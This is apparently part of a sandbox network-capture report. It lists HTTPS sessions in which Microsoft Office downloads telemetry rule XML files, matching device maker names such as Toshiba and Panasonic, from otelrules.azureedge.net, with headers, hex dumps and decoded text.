                                                                                                                                                                                                                                                                                      x-ms-request-id: c6b0c23f-801e-0048-738c-3af3fb000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095418Z-185f5d8b95csp6jmhC1NYCwy6s0000000a0g000000008k4n
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      32192.168.2.64974013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 494
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 65766a7e-a01e-0002-4f8c-3a5074000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095418Z-1777c6cb754xrr98hC1TEB3kag000000094g00000000gsdg
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      33192.168.2.64974313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 420
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 65766a9d-a01e-0002-6d8c-3a5074000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095419Z-185f5d8b95cp7lkfhC1NYC7rpw0000000a3g00000000eky4
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      34192.168.2.64974413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                      x-ms-request-id: dde05796-f01e-0003-6d0e-3b4453000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095419Z-r1d97b99577d6qrbhC1TEBux5s00000008x0000000001b99
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      35192.168.2.64974513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 538c974f-101e-0028-648c-3a8f64000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095419Z-185f5d8b95cjbkr4hC1NYCeu2400000009w000000000ad15
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      36192.168.2.64974613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                      x-ms-request-id: ac667451-e01e-003c-3e8c-3ac70b000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095419Z-185f5d8b95cjbkr4hC1NYCeu240000000a0g000000000n06
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      37192.168.2.64974713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 423
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                      x-ms-request-id: f14fa7ac-201e-000c-4a8c-3a79c4000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095419Z-185f5d8b95c5lcmhhC1NYCsnsw0000000a600000000046xx
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:19 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      38192.168.2.64975013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                      x-ms-request-id: e83eb970-001e-0046-777e-3ada4b000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095420Z-1777c6cb754lv4cqhC1TEB13us00000009fg0000000034ht
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      39192.168.2.64974813.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 478
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 70a27ff5-201e-0051-4e8c-3a7340000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095420Z-185f5d8b95ctl8xlhC1NYCn94g0000000a80000000000sh0
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      40192.168.2.64974913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 404
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
